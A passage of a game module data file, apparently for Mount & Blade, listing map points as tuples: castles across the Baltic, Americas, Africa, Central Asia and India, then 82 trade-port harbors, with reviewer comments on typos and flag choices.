("riga", "Riga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-35.24, -434.74), [], 15.0),
("kaliningrad", "Kaliningrad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.12, -395.28), [], 80.0),
("klaipeda", "Klaipeda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1.88, -412.8), [], 80.0),
("ventspils", "Ventspils", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.64, -440.96), [], 45.0),
("tartu", "Tartu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-62.24, -459.44), [], 315.0),
("parnu", "Parnu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.0, -459.92), [], 25.0),
("jelgava", "Jelgava", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-29.44, -428.2), [], 215.0),
("daugavpils", "Daugavpils", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.4, -414.8), [], 175.0),
# NOTE(review): from this row onward the entries add pf_disabled to the flag mask
# (presumably map points that start hidden/inactive -- verify against flag docs).
("santo_domingo", "Santo domingo", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (997.9, 59.66), [], 35.0),
("south_hedland", "South hedland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.16, 446.68), [], 15.0),
("darwin", "Darwin", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1201.28, 366.12), [], 25.0),
("nashville", "Nashville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1177.16, -134.92), [], 125.0),
("wilmington", "Wilmington", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1080.6, -111.56), [], 180.0),
("saint_augustine", "Saint Augustine", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1119.32, -62.16), [], 280.0),
("oklahoma", "Oklahoma", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1294.36, -126.72), [], 280.0),
("kansas", "Kansas", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1262.32, -171.0), [], 180.0),
("hauston", "Hauston", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1271.24, -61.04), [], 255.0),
("santa_clara", "Santa clara", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1102.24, 19.04), [], 35.0),
("new_orleans", "New orleans", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1214.32, -62.04), [], 45.0),
("rio_de_janeiro", "Rio de janeiro", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (702.2, 470.4), [], 45.0),
("salvador", "Salvador", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (648.64, 366.78), [], 65.0),
# NOTE(review): "Reykjabik" looks like a typo for "Reykjavik" (both id and display
# name) -- left unchanged; renaming the id would break any references elsewhere.
("reykjabik", "Reykjabik", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (469.14, -574.7), [], 255.0),
("la_romana", "La romana", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (982.64, 59.92), [], 315.0),
("karratha", "Karratha", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1020.36, 467.16), [], 255.0),
("kakadu", "Kakadu", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1217.72, 367.08), [], 175.0),
("huntsville", "Huntsville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1175.12, -117.76), [], 115.0),
("fayetteville", "Fayetteville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1091.0, -121.56), [], 35.0),
("lakeland", "Lakeland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1124.64, -41.88), [], 65.0),
("tulsa", "Tulsa", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.6, -134.64), [], 235.0),
("omaha", "Omaha", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.68, -197.64), [], 255.0),
("san_antonio", "San antonio", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1305.4, -56.68), [], 225.0),
("bayamo", "Bayamo", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1066.28, 40.16), [], 185.0),
("mobile", "Mobile", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1191.2, -71.72), [], 75.0),
("santos", "Santos", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (736.0, 481.08), [], 65.0),
("porto_seguro", "Porto seguro", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (656.4, 403.76), [], 45.0),
("arborg", "Arborg", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (458.64, -571.36), [], 90.0),
("vinland", "Vinland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (852.12, -326.56), [], 125.0),
("brattalid", "Brattalid", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (720.12, -493.96), [], 145.0),
("vinland_village", "Vinland Settlements", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (858.6, -317.2), [], 25.0),
("brattalid_village", "Brattalid Settlements", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (726.08, -500.68), [], 115.0),
("mombasa", "Mombasa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-200.88, 280.4), [], 40.0),
("mozambique", "Mozambique", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-213.48, 389.36), [], 35.0),
("luanda", "Luanda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.32, 329.72), [], 125.0),
("yaounde", "Yaounde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (103.64, 205.0), [], 280.0),
("gunue", "Gunue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-174.24, 394.48), [], 65.0),
("malabo", "Malabo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.68, 207.86), [], 265.0),
("nairobi", "Nairobi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-173.2, 255.08), [], 45.0),
("kimayo", "Kimayo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-233.56, 242.4), [], 85.0),
("boma", "Boma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (86.24, 309.72), [], 85.0),
("karagandy", "Karagandy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-568.52, -312.12), [], 145.0),
("samara", "Samara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-316.56, -371.94), [], 55.0),
("naiman", "Naiman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-733.2, -275.2), [], 165.0),
("oskemen", "Oskemen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-671.0, -318.0), [], 25.0),
# NOTE(review): missing the optional trailing facing value present on adjacent
# rows -- confirm intentional.
("saransk", "Saransk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-263.92, -385.72), []),
("karazhal", "Karazhal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-547.8, -289.2), [], 45.0),
("ridder", "Ridder", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-682.72, -325.08), [], 55.0),
("yalta", "Yalta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-143.16, -241.52), [], 90.0),
("naiman_ger", "Naiman ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-760.0, -269.76), [], 170.0),
("nomad_yurt_1", "Nomad yurt 1", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.16, -300.8), [], 70.0),
("nomad_yurt_2", "Nomad yurt 2", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-331.52, -338.52), [], 15.0),
("nomad_yurt_3", "Nomad yurt 3", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-473.8, -317.88), [], 275.0),
("nomad_yurt_4", "Nomad yurt 4", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-617.28, -321.96), [], 315.0),
("xiongnu", "Xiongnu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.96, -154.6), [], 15.0),
("wuhuan", "Wuhuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1047.2, -208.0), [], 325.0),
("goa", "Goa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-580.0, 92.0), [], 135.0),
("calcutta", "Calcutta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-735.6, 17.6), [], 260.0),
("vijayanagara", "Vijayanagara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-681.8, 64.0), [], 260.0),
# NOTE(review): both rows below omit the optional trailing facing value present
# on adjacent rows -- confirm intentional. Also "Columbo" may be a typo for
# "Colombo" (runtime string, left unchanged).
("mumbai", "Mumbai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-567.2, 54.24), []),
("columbo", "Columbo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-644.64, 175.48), []),
("mysore", "Mysore", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-608.0, 121.92), [], 180.0),
("cochi", "Cochi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-605.3, 147.06), [], 75.0),
("chennai", "Chennai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-646.56, 114.76), [], 45.0),
("aurangabad", "Aurangabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-593.48, 45.48), [], 145.0),
("ranchi", "Ranchi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-702.4, 8.96), [], 275.0),
("vijayawada", "Vijayawada", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-650.52, 81.2), [], 260.0),
("pune", "Pune", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-577.2, 60.0), [], 90.0),
("kandy", "Kandy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-651.24, 170.0), [], 180.0),
("rajkot", "Rajkot", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-544.0, 20.28), [], 45.0),
# "place_end": sentinel row (static, unlabelled, hidden) terminating the castle
# point entries above; the rows after it switch to harbor/village icon flags and
# the fac_tradeport faction -- presumably sea trade-port locations.
("place_end", "place end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.0, 52.0), []),
("tradeport1", "St Helena", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (291.16, 398.48), [], 340.0),
("tradeport2", "Toliara", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-247.8, 477.1), [], 90.0),
("tradeport3", "Socotra", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-359.54, 121.58), [], 180.0),
("tradeport4", "Batavia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-943.8, 300.88), [], 330.0),
("tradeport5", "Santa Cruz", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (406.86, -45.64), [], 225.0),
("tradeport6", "Sierra Leone", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (395.38, 135.4), [], 135.0),
("tradeport7", "Nicobar", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-781.8, 123.6), [], 90.0),
("tradeport8", "Aceh", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-811.6, 188.48), [], 45.0),
("tradeport9", "Luanda", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (85.78, 329.1), [], 45.0),
("tradeport10", "Bermuda", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (935.68, -87.88), [], 225.0),
("tradeport11", "Chaleston", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1100.48, -95.32), [], 215.0),
("tradeport12", "San Juan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (950.72, 59.48), [], 340.0),
("tradeport13", "Barbados", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (880.32, 111.98), [], 40.0),
("tradeport14", "Havana", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1127.8, 10.88), []),
("tradeport15", "Santo Domingo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (997.88, 62.24), [], 180.0),
("tradeport16", "Santo Maria", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1040.02, 132.42), [], 15.0),
("tradeport17", "New Heaven", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1025.34, -197.46), [], 200.0),
("tradeport18", "San Miguel", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1178.56, 39.34), []),
("tradeport19", "Aden", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-262.7, 116.36), [], 195.0),
("tradeport20", "Mogadishu", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-267.94, 221.96), [], 225.0),
("tradeport21", "Cape Verde", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (486.38, 93.22), []),
("tradeport22", "Port Hedland", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1069.08, 442.64), [], 20.0),
("tradeport23", "Merauke", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1305.82, 327.38), [], 135.0),
("tradeport24", "Nagasaki", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1188.14, -93.18), [], 135.0),
("tradeport25", "Busan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1181.26, -122.0), [], 225.0),
("tradeport26", "Shanghai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1101.94, -75.68), [], 265.0),
("tradeport27", "Weihai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1105.26, -150.98), [], 315.0),
("tradeport28", "Manila", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1091.96, 99.3), [], 90.0),
("tradeport29", "Nanzi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1084.34, 16.9), [], 135.0),
("tradeport30", "Haiphong", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-936.62, 37.92), [], 225.0),
("tradeport31", "Bangkok", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-869.76, 110.7), [], 180.0),
("tradeport32", "Calcutta", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-735.8, 26.8), [], 165.0),
("tradeport33", "Goa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-575.82, 90.2), [], 105.0),
("tradeport34", "Lisbon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (328.62, -162.24), [], 180.0),
("tradeport35", "Cadiz", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (298.24, -140.0), [], 120.0),
("tradeport36", "Bristol", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (259.52, -342.56), [], 80.0),
("tradeport37", "Nante", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (249.9, -279.66), [], 135.0),
("tradeport38", "Amsterdam", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (173.64, -358.62), [], 330.0),
("tradeport39", "Copenhagen", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (94.34, -407.86), [], 270.0),
("tradeport40", "Stockholm", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (23.52, -472.22), [], 225.0),
("tradeport41", "Ceuta", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (288.74, -130.76), []),
("tradeport42", "Valencia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (231.8, -177.28), [], 270.0),
("tradeport43", "Marseille", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (170.56, -224.36), [], 100.0),
("tradeport44", "Syracuse", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (62.26, -146.62), [], 270.0),
("tradeport45", "Roma", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (96.08, -206.28), [], 135.0),
("tradeport46", "Tunis", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (117.12, -144.96), [], 300.0),
("tradeport47", "Athens", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-33.04, -152.98), [], 210.0),
("tradeport48", "Alexandria", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-97.82, -77.6), [], 25.0),
("tradeport49", "Constantinople", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-84.18, -194.84), [], 160.0),
("tradeport50", "Tripoli", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-163.08, -115.28), [], 60.0),
("tradeport51", "Muscat", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-410.0, 5.92), []),
("tradeport52", "Cape town", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (28.34, 592.82), [], 45.0),
("tradeport53", "Mozambique", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-215.28, 384.76), [], 270.0),
("tradeport54", "Calabar", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (138.34, 198.74), [], 180.0),
("tradeport55", "Ponta Delgada", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (509.42, -152.42), [], 135.0),
("tradeport56", "Funchal", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (414.36, -93.14), [], 175.0),
("tradeport57", "San Andres", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1119.84, 121.94), [], 115.0),
("tradeport58", "London", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (225.0, -342.52), [], 240.0),
("tradeport59", "Incheon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1153.04, -148.46), [], 90.0),
("tradeport60", "Lome", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (217.46, 184.68), [], 225.0),
("tradeport61", "Gdynia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (25.94, -391.94), [], 295.0),
("tradeport62", "Oslo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (113.6, -487.32), [], 180.0),
("tradeport63", "Carballo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (324.58, -225.52), []),
("tradeport64", "Hongkong", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1014.72, 21.88), [], 180.0),
("tradeport65", "Le havre", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (228.04, -312.32), [], 90.0),
("tradeport66", "Rio de janeiro", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (697.74, 471.84), [], 180.0),
("tradeport67", "Sakai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1249.52, -115.96), [], 90.0),
("tradeport68", "Mombasa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-203.56, 283.12), [], 260.0),
("tradeport69", "Venezia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (92.61, -254.04), [], 225.0),
("tradeport70", "Sham el sheikh", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-145.0, -39.42), [], 225.0),
("tradeport71", "Abadan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-300.42, -60.64), [], 225.0),
("tradeport72", "Tianjin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1057.0, -168.2), [], 225.0),
("tradeport73", "Karachi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-504.06, -4.82), [], 125.0),
("tradeport74", "Trabzon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-206.4, -195.26), []),
("tradeport75", "Riga", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-33.66, -436.26), [], 35.0),
("tradeport76", "Edo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1297.84, -126.76), [], 235.0),
("tradeport77", "Izumo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1220.72, -124.96), [], 90.0),
("tradeport78", "Lianyungang", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1075.2, -117.66), [], 315.0),
("tradeport79", "Yingkou", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1103.68, -189.48), [], 135.0),
("tradeport80", "Haesamwi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1209.86, -219.32), [], 225.0),
("tradeport81", "Sapporo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1313.76, -223.98), [], 35.0),
("tradeport82", "Caliari", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (131.48, -169.62), [], 245.0),
